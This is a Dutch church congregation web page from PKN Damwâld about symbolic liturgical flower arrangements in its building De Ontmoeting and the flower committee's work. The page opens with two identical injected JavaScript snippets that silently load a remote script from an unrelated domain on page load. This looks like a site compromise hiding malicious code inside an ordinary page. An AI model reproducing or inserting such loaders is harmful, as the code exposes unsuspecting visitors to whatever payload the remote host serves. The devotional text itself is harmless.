;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Liturgische schikkingen in De Ontmoeting - PKN Damwâld

Liturgische schikkingen in De Ontmoeting

Gepubliceerd op: zaterdag 11 december 2021

Een mooi bloemstuk brengt schoonheid in de kerk, maar een symbolische bloemschikking kan iemand diep raken. Met vorm en kleur verbeeldt een symbolische bloemschikking het thema van een viering of de kleur van het kerkelijk jaar. In de kerkelijke traditie spelen de bloemschikkingen al lange tijd een rol om het verhaal van het Evangelie te vertellen. Op bijzondere- en hoogtijdagen vind je in het liturgische centrum van de Ontmoeting dan ook bloemschikkingen die de periode van het kerkelijk jaar ondersteunen. Wan­neer je kleuren, vormen, lijnen en karakter van bloemen en planten vertaalt naar Bijbelse symbo­len en thematieken, krijgen de bloemstukken meer verdieping en meer een­heid met de liturgie. Het is namelijk mogelijk om met de beeldkracht en symboliek van bloemen, planten en andere materialen geloofsthema’s aanschouwelijk te maken. Het blijft steeds een uitdaging om aan de hand van een thema, Bijbelverhaal, een bloemstuk of schikking te maken. Zoeken naar symbolen, kleuren, vormen en schiktechnieken, bloemen, vruchten en takken die passen in het seizoen, het liefst uit de tuin. Met eerbied en respect voor de natuur en de schepping. Het is boeiend om vanuit de inspiratie die de Bijbel biedt, met verhalen over God en mensen door middel van een schikking vorm te geven aan geloof in het leven van alledag.

Er zijn (en worden) door de bloemencommissie ook dit jaar weer veel prachtige schikkingen gemaakt. Het loont de moeite om ze (nogmaals) te bekijken en ze mét de begeleidende uitleg op je te laten inwerken. Op deze website zijn de liturgische schikkingen terug te vinden die in de loop van de jaren door de bloemengroep gemaakt zijn: